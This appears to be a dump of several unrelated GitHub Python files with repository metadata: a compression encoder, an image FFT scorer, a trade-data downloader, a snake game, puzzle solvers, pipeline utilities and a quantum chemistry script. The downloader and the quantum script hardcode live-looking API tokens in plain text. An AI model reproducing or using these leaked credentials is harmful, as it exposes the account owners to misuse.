\r\nfor i in range(len(numeralRep)):\r\n    compareI = numeralRep[i]\r\n    if(compareI[0] != \"0\"):\r\n        print(compareI)\r\n        print(\"Hello\", compareI[1:])\r\n        for j in range(len(codedList)):\r\n            print(i)\r\n            print(codedString)\r\n            if(compareI[1:] == codedString[j]):\r\n                codedList.append(compareI[0] + \" \" + str(codedList[j] + 1))\r\n                codedString.append(compareI)\r\n\r\n\r\nencodedString = []\r\nappendingBin = []\r\nmaxLength = 0\r\n    \r\nfor i in range(len(codedList)):\r\n\r\n    appendingBin = []\r\n    \r\n    encodedType = codedList[i]\r\n    \r\n    if(isinstance(encodedType, int)):\r\n        encodedString.append(bin(encodedType)[2:])\r\n    \r\n    if(isinstance(encodedType, str)):\r\n        encodedType = encodedType.split()\r\n        print(\"Yes: \", encodedType)\r\n        \r\n        for j in encodedType:\r\n            print(type(j))\r\n            print(j)\r\n            j = int(j)\r\n            j = bin(j)[2:]\r\n            j = str(j)\r\n            if(len(j)<2):\r\n                j = \"0\"+ j \r\n            appendingBin.append(j)\r\n        \r\n        appendingBin = [\"\".join(appendingBin)]\r\n        print(\"appending: \", len(appendingBin[0]))\r\n        if len(appendingBin[0]) > maxLength:\r\n            maxLength = len(appendingBin[0])\r\n            print(\"Max length: \", maxLength)\r\n        print(appendingBin)\r\n        encodedString.append(appendingBin[0])\r\n    \r\n\r\nfor i in range(len(encodedString)):\r\n    if len(encodedString[i]) < maxLength:\r\n        addCeros = maxLength - len(encodedString[i])\r\n        for j in range(addCeros):\r\n            encodedString[i] = \"0\" + encodedString[i] \r\n    \r\n\r\nprint(\"Initial string: \", sequence)\r\nprint(\"Encoded String: \",encodedString) \r\n\r\ntextfile = open(\"encoded.txt\", \"w\")\r\n\r\nfor element in encodedString:\r\n    textfile.write(element)\r\n\r\n\r\ntextfile.close()\r\ntextfile = open(\"dictionary.txt\", \"w\")\r\n\r\nfor element in sequence:\r\n    textfile.write(element + \" \")\r\n\r\ntextfile.write(\"\\n\")\r\n\r\nfor element in encodedString:\r\n    textfile.write(element + \" \")\r\n    \r\ntextfile.write(\"\\n\" + str(maxLength)) \r\ntextfile.close()\r\n\r\n\r\nprint(\"Coded List: \", codedList) \r\nprint(\"Coded String: \",codedString) \r\nprint(\"Max length: \", maxLength)\r\n \r\n \r\nprint(numeralRep)\r\nprint(sequence) ","repo_name":"ExoticTurtles/Lempel-Ziv-algorithm","sub_path":"encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":5082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71731511160","text":"import numpy as np\n\n\ndef compare_fft(original_image, degraded_image):\n    # Compute the FFT of both images\n    original_fft = np.fft.fft2(original_image)\n    degraded_fft = np.fft.fft2(degraded_image)\n\n    # Compute the magnitude of the FFT\n    original_mag = np.abs(original_fft)\n    degraded_mag = np.abs(degraded_fft)\n\n    # Normalize the magnitudes to [0, 1]\n    original_mag /= original_mag.max()\n    degraded_mag /= degraded_mag.max()\n\n    # Compute the absolute difference between the magnitudes\n    diff = np.abs(original_mag - degraded_mag)\n\n    # Compute the score as the mean of the difference\n    score = 1 - diff.mean()\n\n    return round(score, 3)\n","repo_name":"PsiRho/IDATG2206_CV_GroupProject","sub_path":"MISS/comp_fft.py","file_name":"comp_fft.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35681449435","text":"import requests\nimport json\nimport pandas as pd\n\ndf = pd.read_csv('APIdata/country-codes_csv.csv')\ncodes = df['ISO3166-1-numeric']\n\nchunks = [codes[x:x+100] for x in range(0, len(codes), 100)]\n
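\n# Note: '%2C' below is a URL-encoded comma, so each entry in pers packs several\n# survey years into a single 'ps' query parameter for the Comtrade API call.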
\npers = ['1965%2C1970%2C1975%2C1980%2C1985','1990%2C1995%2C2000%2C2005%2C2010','2015%2C2020']\n\nfor per in pers:\n    f = open('APIdata/'+str(per)+'.csv', \"a\")\n    for j in codes:\n        response = requests.get(\"https://comtrade.un.org/api/get?max=100000&type=C&freq=A&px=HS&ps=\"+str(per)+\"&r=\"+str(int(j))+\"&p=all&rg=all&cc=TOTAL&uitoken=876de0f1c9ddf87ed64b9f69c18cf33d&fmt=csv\")\n        print(response.status_code)\n        print(\"https://comtrade.un.org/api/get?max=100000&type=C&freq=A&px=HS&ps=\"+str(per)+\"&r=\"+str(int(j))+\"&p=all&rg=all&cc=TOTAL&uitoken=dd9df0fdbf9b219648145c7bae091339&fmt=csv\")\n        f.write(response.text)\n    f.close()\n","repo_name":"bojanDj/WorldTrade","sub_path":"trade/compress.py","file_name":"compress.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22089745610","text":"from turtle import Turtle\n\n\n\nFONT = (\"Arial\",15,\"normal\")\nALIGNMENT = \"center\"\nclass Score(Turtle):\n    def __init__(self):\n        super().__init__()\n        self.hideturtle()\n        self.color(\"white\")\n        self.penup()\n        self.goto(0,270)\n        self.score = 0\n        with open(\"data.txt\") as data:\n            self.high_score = int(data.read())\n        self.write(arg=f\"Score : {self.score} High Score: {self.high_score}\", move=False,align=ALIGNMENT, font=FONT)\n\n    def update(self):\n        self.clear()\n        self.write(arg=f\"Score : {self.score} High Score: {self.high_score}\", move=False,align=ALIGNMENT, font=FONT)\n\n    def reset(self):\n        if(self.score > self.high_score):\n            self.high_score = self.score\n            with open(\"data.txt\", mode=\"w\") as data:\n                data.write(f\"{self.high_score}\")\n        self.score = 0\n        self.update()\n        self.write(arg=f\"Score : {self.score} High Score: {self.high_score}\", move=False,align=ALIGNMENT, font=FONT)\n\n\n    def gameover(self):\n        self.color(\"red\")\n        self.goto(0,0)\n        self.write(\"GAME OVER\", move=False, align=\"center\",font=(\"Monospaced\", 20, \"normal\"))\n\n","repo_name":"shaowei0925/Snake-Game","sub_path":"scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26368959950","text":"from math import atan2, sqrt, pi\nfrom collections import namedtuple\n\nvec = namedtuple(\"vec\", [\"x\", \"y\"])\n\ndef angle(a, b):\n    return pi/2 + atan2(a.y-b.y, a.x-b.x)\n\ndef dist(a, b):\n    return sqrt((a.x-b.x)**2 + (a.y-b.y)**2)\n\ndef part_one(asteroids):\n    angles = {a: [angle(a, b) for b in asteroids if a != b] for a in asteroids}\n    base = max(angles.keys(), key=lambda k: len(set(angles[k])))\n    return len(set(angles[base])), base\n\ndef part_two(asteroids, base):\n    angles_around_base = {angle(a, base): sorted([(a, dist(a, base))]) for a in asteroids if a != base}\n    keys = sorted(angles_around_base.keys())\n    first_minus = keys.index(max([i for i in keys if i < 0]))\n    keys = keys[first_minus+1:] + keys[:first_minus+1]\n\n    vapourised = [angles_around_base[angle].pop(0) for angle in keys][199][0]\n    return vapourised.x*100 + vapourised.y, vapourised\n\n\nasteroids = []\nwith open(\"input.txt\") as lines:\n    for y, line in enumerate(lines.readlines()):\n        for x, c in enumerate(list(line)):\n            if c == '#':\n                asteroids.append(vec(x, y))\n\ncount, base = part_one(asteroids)\nprint(\"Part One: {} ({})\".format(count, base))\nprint(\"Part Two: {} ({})\".format(*part_two(asteroids,
base)))\n","repo_name":"ewancook/aoc2019","sub_path":"10/asteroids.py","file_name":"asteroids.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30871194211","text":"import gazu\nimport os\nimport json\nfrom .exceptions import *\n\n\ndef print_align(content, keys=None):\n if type(content) == dict:\n if not keys:\n keys = content.keys()\n print(' {')\n for key, value in content.items():\n if key in keys:\n print(f'\\t\"{key}\":{value}')\n print(' }')\n return\n if type(content) == list:\n print('[')\n for i in content:\n print(f'index-{content.index(i)}')\n print_align(i, keys)\n print(']')\n return\n\n\ndef print_info(content):\n if type(content) == list:\n print(f\"dict_count: {len(content)}\")\n if len(content):\n print(f\"dict_len: {len(content[0])}\")\n return\n\n\ndef user_info_tree(comptasks):\n \"\"\"\n list : 로그인 된 'user'를 기준으로 정렬된 프로젝트, 시퀀스, 테스크\n\n user를 기준으로 CompTask를 활용해서 사용자(아티스트)가 할당 되어 있는 task를 tree형태로 보여 준다.\n\n \"\"\"\n result_dict = {}\n for comp_task in comptasks:\n proj_name = comp_task.proj_name\n seq_name = comp_task.seq_name\n if proj_name not in result_dict:\n result_dict[proj_name] = {}\n if seq_name not in result_dict[proj_name]:\n result_dict[proj_name][seq_name] = []\n result_dict[proj_name][seq_name].append(comp_task.shot_name)\n\n return result_dict\n\n\ndef construct_full_path(file: dict):\n \"\"\"\n output file이나 working file의 딕셔너리를 받아서 확장자까지 연결된 full path를 반환\n\n Args:\n file(dict):working file 혹은 output file dict\n\n Returns:\n str: file의 실제 절대경로\n {dir_name}/{file_name}.{extension}\n 확장자가 레스터 이미지 확장자인 경우, padding을 포함\n {dir_name}/{file_name}.####.{extension}\n \"\"\"\n path = file.get('path')\n file_type = file.get('type')\n padding = '.'\n if file_type == 'WorkingFile':\n software_id = file.get('software_id')\n ext = gazu.files.get_software(software_id).get('file_extension')\n elif file_type == 'OutputFile':\n output_type = file.get('output_type_id')\n ext = gazu.files.get_output_type(output_type).get('short_name')\n if ext in ['exr', 'dpx', 'jpg', 'jpeg', 'png', 'tga']:\n padding = '_####.'\n else:\n raise Exception('파일 딕셔너리가 아님')\n return path + padding + ext\n\n\ndef construct_initials(full_name: str):\n \"\"\"\n full name을 입력받아 last name을 제외한 나머지를 축약해 반환\n 반환되는 initials의 첫 글자는 대문자로 변환되며, '.'으로 구분됨\n\n Args:\n full_name(str): 띄어쓰기로 구분되는 전체 이름\n \"Mohandas Karamchand gandhi\"\n\n Returns:\n str: 축약된 initials\n \"M.K.Gandhi\"\n\n \"\"\"\n if len(full_name) == 0:\n return\n initials = \"\"\n split_name = full_name.split(\" \")\n for i in range(len(split_name)-1):\n initials += split_name[i][0].upper() + \".\"\n initials += split_name[-1][0].upper() + split_name[-1][1:]\n return initials\n\n\nclass TaskType:\n\n def __init__(self, task_type_dict):\n self.task_type_dict = task_type_dict\n self.dir_path = os.path.expanduser('~/.config/Molo/')\n self.task_type_list_path = os.path.join(self.dir_path, 'task_type_list.json')\n\n if self.access_task_type():\n self.load_task_type()\n\n def access_task_type(self):\n \"\"\"\n 디렉토리와 각 json 파일이 존재하는지 확인하고 없으면 초기화\n\n Returns:\n bool: self.task_type_list_path에 해당하는 json 파일이 존재하거나 생성되면 True, 아니면 False\n \"\"\"\n if not os.path.exists(self.dir_path):\n try:\n os.makedirs(self.dir_path)\n except OSError:\n raise TaskTypeFileIOError(\"Error: Failed to create the directory.\")\n\n try:\n if not os.path.exists(self.task_type_list_path):\n self.reset_task_type()\n except OSError:\n raise TaskTypeFileIOError(\"Error: 
\n\n    def load_task_type(self):\n        \"\"\"\n        Read the saved information from the json file\n\n        the task_type_list recorded in the json\n\n        Returns: dictionary\n\n        \"\"\"\n        task_type_dict = {}\n\n        with open(self.task_type_list_path, 'r') as json_file:\n            task_type_dict = json.load(json_file)\n\n        # fall back to the default value if there is no content\n        if len(task_type_dict.get(\"task_type_list\")) != 0:\n            pass\n        else:\n            task_type_dict = {\"task_type_list\": [\"FX\", \"Plate\", \"Lighting\", \"Camera\"]}\n\n        return task_type_dict\n\n    def save_task_type(self):\n        \"\"\"\n        Save the selected task type list\n        \"\"\"\n        print(self.task_type_dict)\n        with open(self.task_type_list_path, 'w') as json_file:\n            json.dump(self.task_type_dict, json_file)\n\n    def reset_task_type(self):\n        \"\"\"\n        Delete the information stored in the json file\n        \"\"\"\n        self.task_type_dict = {\"task_type_list\": []}\n\n        self.save_task_type()\n","repo_name":"MOLA-kr/molo","sub_path":"python/molo/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5269,"program_lang":"python","lang":"ko","doc_type":"code","stars":23,"dataset":"github-code","pt":"40"} +{"seq_id":"19264844806","text":"# Quantum chemistry\nimport sys\nimport os\n\n# import qiskit from qiskit-sdk-py folder\ntry:\n    sys.path.append(os.path.join(os.path.dirname(__file__), '../../../', 'qiskit-sdk-py'))\n    import Qconfig\n    qx_config = {\n        \"APItoken\": Qconfig.APItoken,\n        \"url\": Qconfig.config['url']}\nexcept:\n    qx_config = {\n        \"APItoken\":\"da2a4002660558a35103a600bcbda7fe438cea629a6be98969ea5e367c091b6815e624bd86b6207121bd97fef79c22033318a4402eeafcbd04b021fd80f5a195\",\n        \"url\":\"https://quantumexperience.ng.bluemix.net/api\"\n    }\n\n# useful packages\nimport matplotlib.pyplot as plt \nimport numpy as np \nfrom scipy import linalg as la \nfrom functools import partial\n\n# importing the QISKit\nfrom qiskit import QuantumProgram \nimport Qconfig\n\n# import basic plot tools\nfrom qiskit.tools.visualization import plot_histogram\n\n# import optimization tools\nfrom qiskit.tools.apps.optimization import trial_circuit_ryrz, SPSA_optimization, SPSA_calibration\nfrom qiskit.tools.apps.optimization import Hamiltonian_from_file, make_Hamiltonian\nfrom qiskit.tools.apps.optimization import eval_hamiltonian, group_paulis\n\n# Ignore warnings due to chopping of small imaginary part of the energy\nimport warnings\nwarnings.filterwarnings('ignore')\n\nn = 2\nm = 6\ndevice = 'local_qasm_simulator'\n\n# Optimization\nQ_program = QuantumProgram()\nQ_program.set_api(Qconfig.APItoken,Qconfig.config[\"url\"])\n\ninitial_theta = np.random.randn(2*n*m)\nentangler_map = Q_program.get_backend_configuration(device)['coupling_map'] # the map of two-qubit gates with control at key and target at values\nif entangler_map == 'all-to-all':\n    entangler_map = {i: [j for j in range(n) if j !=i] for i in range(n)}\nshots = 1\nmax_trials = 100\nham_name='H2/H2Equilibrium.txt'\n# ham_name='LIH/LiHEquilibrium.txt' # For optimization of LiH at bond length\n \n# Extract Energy\npauli_list = Hamiltonian_from_file(ham_name)\nH=make_Hamiltonian(pauli_list)\nexact=np.amin(la.eig(H)[0]).real\nprint('The exact ground state energy is:')\nprint(exact)\npauli_list_grouped=group_paulis(pauli_list)\n\n\ndef cost_function(Q_program,H,n,m,entangler_map,shots,device,theta):\n    \n    return eval_hamiltonian(Q_program,H,trial_circuit_ryrz(n,m,theta,entangler_map,None,False),shots,device).real
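\n\n# For illustration, a single direct evaluation (the partial() calls below bind the same\n# leading arguments): energy = cost_function(Q_program, H, n, m, entangler_map, shots, device, initial_theta)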
\n\n\ninitial_c=0.01\ntarget_update=2*np.pi*0.1\nsave_step = 20\n\nif shots == 1:\n    SPSA_params=SPSA_calibration(partial(cost_function,Q_program,H,n,m,entangler_map,shots,device),initial_theta,initial_c,target_update,25)\n    output=SPSA_optimization(partial(cost_function,Q_program,H,n,m,entangler_map,shots,device),initial_theta,SPSA_params,max_trials,save_step,1)\nelse:\n    SPSA_params=SPSA_calibration(partial(cost_function,Q_program,pauli_list_grouped,n,m,entangler_map, shots,device),initial_theta,initial_c,target_update,25)\n    output=SPSA_optimization(partial(cost_function,Q_program,pauli_list_grouped,n,m,entangler_map,shots,device), initial_theta,SPSA_params,max_trials,save_step,1)\n\n","repo_name":"oimichiu/quantumGateModel","sub_path":"IBMQX/qiskit-tutorials/coduriCareNUcompileaza/tutoriale-QISKit/reference/approximateQuantumComputers/quantum_chemestry.py","file_name":"quantum_chemestry.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21692378808","text":"import heapq\nfor _ in range(int(input())):\n    k = int(input())\n    q = list(map(int, input().split()))\n    heapq.heapify(q)\n    answer = 0\n    while len(q) > 1:\n        x = heapq.heappop(q)\n        y = heapq.heappop(q)\n        answer += x + y\n        heapq.heappush(q, x + y)\n    print(answer)","repo_name":"thing-zoo/algorithm-study","sub_path":"BOJ/thing-zoo/15.우선순위큐/13975-파일 합치기3/13975.py","file_name":"13975.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"4777718079","text":"# import libraries for quiz functions\n# set introduction prompts\n# call functions for each quiz\n# culminate with a final score\n# import powershell_quiz as ps\nimport math\nimport python_quiz as pyt\n\n# def progress_bar(progress, total):\n#     percent = 100 * (progress / float(total))\n#     bar = '█' * int(percent) + '-' * (100 - int(percent))\n#     print(f\"\\r|{bar}| {percent:.2f}%\", end=\"\\r\")\n    \n# numbers = [x * 5 for x in range(2000, 3000)]\n# results = []\n\n# for i, x in enumerate(numbers):\n#     results.append(math.factorials(x))\n#     progress_bar(0, len(numbers))\n\nprint('Welcome to the quiz nexus!' )\n\nplaying = input(\"Do you want to learn? \")\n\nif playing.lower() != \"yes\":\n    quit()\nprint(\"OK! Let's go! \")\n    \npyt.pythonTest()\n\ndef nexusGreetings():\n    print('Welcome to the quiz nexus!'
)","repo_name":"cortuga/Quiz-Nexus","sub_path":"Nexus.py","file_name":"Nexus.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16176275503","text":"import os\nimport sys\nimport subprocess\nimport io\nimport getopt\n# -----------------------------------------------------------------------------------------------------------\n# Global variables\n# -----------------------------------------------------------------------------------------------------------\nARFF_HEADER = '''@RELATION effectors\n@ATTRIBUTE A NUMERIC\n@ATTRIBUTE C NUMERIC\n@ATTRIBUTE D NUMERIC\n@ATTRIBUTE E NUMERIC\n@ATTRIBUTE F NUMERIC\n@ATTRIBUTE G NUMERIC\n@ATTRIBUTE H NUMERIC\n@ATTRIBUTE I NUMERIC\n@ATTRIBUTE K NUMERIC\n@ATTRIBUTE L NUMERIC\n@ATTRIBUTE M NUMERIC\n@ATTRIBUTE N NUMERIC\n@ATTRIBUTE P NUMERIC\n@ATTRIBUTE Q NUMERIC\n@ATTRIBUTE R NUMERIC\n@ATTRIBUTE S NUMERIC\n@ATTRIBUTE T NUMERIC\n@ATTRIBUTE V NUMERIC\n@ATTRIBUTE W NUMERIC\n@ATTRIBUTE Y NUMERIC\n@ATTRIBUTE MolecularWeight NUMERIC\n@ATTRIBUTE PosCharge NUMERIC\n@ATTRIBUTE NegCharge NUMERIC\n@ATTRIBUTE Exposed NUMERIC\n@ATTRIBUTE Hydrophobicity NUMERIC\n@ATTRIBUTE polarity NUMERIC\n@ATTRIBUTE flexibility NUMERIC\n@ATTRIBUTE aromatic NUMERIC\n@ATTRIBUTE polar NUMERIC\n@ATTRIBUTE disorder NUMERIC\n@ATTRIBUTE Bulky NUMERIC\n@ATTRIBUTE Alpha NUMERIC\n@ATTRIBUTE Beta NUMERIC\n@ATTRIBUTE Coil NUMERIC\n@ATTRIBUTE class {effector,non-effector}\n@DATA\n'''\n# -----------------------------------------------------------------------------------------------------------\nSCRIPT_PATH = sys.path[0]\n\nmodels_bayes_cytoplasmic_fungionly = [SCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Mycorrhizal_Bayes//trainingdata_iteration85_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Mycorrhizal_Bayes//trainingdata_iteration75_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Mycorrhizal_Bayes//trainingdata_iteration100_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Mycorrhizal_Bayes//trainingdata_iteration41_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Mycorrhizal_Bayes//trainingdata_iteration31_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Pathogens_Bayes//trainingdata_iteration92_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Pathogens_Bayes//trainingdata_iteration16_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Pathogens_Bayes//trainingdata_iteration84_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Pathogens_Bayes//trainingdata_iteration2_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Pathogens_Bayes//trainingdata_iteration96_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Saprophytes_Bayes//trainingdata_iteration34_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Saprophytes_Bayes//trainingdata_iteration64_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Saprophytes_Bayes//trainingdata_iteration88_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Saprophytes_Bayes//trainingdata_iteration23_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Saprophytes_Bayes//trainingdata_iteration32_ratio3.model']\n\nmodels_J48_cytoplasmic_fungionly = [SCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Mycorrhizal_J48//trainingdata_iteration77_ratio3.model',\nSCRIPT_PATH + 
'/TrainingData_CytoplasmicFungiOnly_Mycorrhizal_J48//trainingdata_iteration61_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Mycorrhizal_J48//trainingdata_iteration95_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Mycorrhizal_J48//trainingdata_iteration46_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Mycorrhizal_J48//trainingdata_iteration56_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Pathogens_J48//trainingdata_iteration85_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Pathogens_J48//trainingdata_iteration58_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Pathogens_J48//trainingdata_iteration87_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Pathogens_J48//trainingdata_iteration25_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Pathogens_J48//trainingdata_iteration97_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Saprophytes_J48//trainingdata_iteration85_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Saprophytes_J48//trainingdata_iteration13_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Saprophytes_J48//trainingdata_iteration22_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Saprophytes_J48//trainingdata_iteration91_ratio3.model',\nSCRIPT_PATH + '/TrainingData_CytoplasmicFungiOnly_Saprophytes_J48//trainingdata_iteration21_ratio3.model']\n\nmodels_bayes_cytoplasmic = [SCRIPT_PATH + '/TrainingData_Cytoplasmic_Mycorrhizal_Bayes//trainingdata_iteration39_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Mycorrhizal_Bayes//trainingdata_iteration17_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Mycorrhizal_Bayes//trainingdata_iteration76_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Mycorrhizal_Bayes//trainingdata_iteration74_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Mycorrhizal_Bayes//trainingdata_iteration78_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Pathogens_Bayes//trainingdata_iteration79_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Pathogens_Bayes//trainingdata_iteration1_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Pathogens_Bayes//trainingdata_iteration32_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Pathogens_Bayes//trainingdata_iteration70_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Pathogens_Bayes//trainingdata_iteration77_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Saprophytes_Bayes//trainingdata_iteration14_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Saprophytes_Bayes//trainingdata_iteration71_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Saprophytes_Bayes//trainingdata_iteration44_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Saprophytes_Bayes//trainingdata_iteration62_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Saprophytes_Bayes//trainingdata_iteration64_ratio3.model']\n\nmodels_J48_cytoplasmic = [SCRIPT_PATH + '/TrainingData_Cytoplasmic_Mycorrhizal_J48//trainingdata_iteration36_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Mycorrhizal_J48//trainingdata_iteration14_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Mycorrhizal_J48//trainingdata_iteration63_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Mycorrhizal_J48//trainingdata_iteration60_ratio3.model',\nSCRIPT_PATH + 
'/TrainingData_Cytoplasmic_Mycorrhizal_J48//trainingdata_iteration29_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Pathogens_J48//trainingdata_iteration67_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Pathogens_J48//trainingdata_iteration92_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Pathogens_J48//trainingdata_iteration78_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Pathogens_J48//trainingdata_iteration1_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Pathogens_J48//trainingdata_iteration34_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Saprophytes_J48//trainingdata_iteration36_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Saprophytes_J48//trainingdata_iteration71_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Saprophytes_J48//trainingdata_iteration67_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Saprophytes_J48//trainingdata_iteration91_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Cytoplasmic_Saprophytes_J48//trainingdata_iteration70_ratio3.model']\n\nmodels_bayes_apoplastic = [SCRIPT_PATH + '/TrainingData_Apoplastic_Animal_Bayes//trainingdata_iteration19_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Animal_Bayes//trainingdata_iteration70_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Animal_Bayes//trainingdata_iteration78_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Animal_Bayes//trainingdata_iteration80_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Animal_Bayes//trainingdata_iteration92_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Pathogens_Bayes//trainingdata_iteration40_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Pathogens_Bayes//trainingdata_iteration31_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Pathogens_Bayes//trainingdata_iteration98_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Pathogens_Bayes//trainingdata_iteration76_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Pathogens_Bayes//trainingdata_iteration53_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Saprophytes_Bayes//trainingdata_iteration61_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Saprophytes_Bayes//trainingdata_iteration79_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Saprophytes_Bayes//trainingdata_iteration29_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Saprophytes_Bayes//trainingdata_iteration91_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Saprophytes_Bayes//trainingdata_iteration32_ratio3.model']\n\nmodels_J48_apoplastic = [SCRIPT_PATH + '/TrainingData_Apoplastic_Animal_J48//trainingdata_iteration82_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Animal_J48//trainingdata_iteration19_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Animal_J48//trainingdata_iteration46_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Animal_J48//trainingdata_iteration47_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Animal_J48//trainingdata_iteration100_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Pathogens_J48//trainingdata_iteration26_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Pathogens_J48//trainingdata_iteration98_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Pathogens_J48//trainingdata_iteration49_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Pathogens_J48//trainingdata_iteration9_ratio3.model',\nSCRIPT_PATH + '/TrainingData_Apoplastic_Pathogens_J48//trainingdata_iteration78_ratio3.model',\nSCRIPT_PATH + 
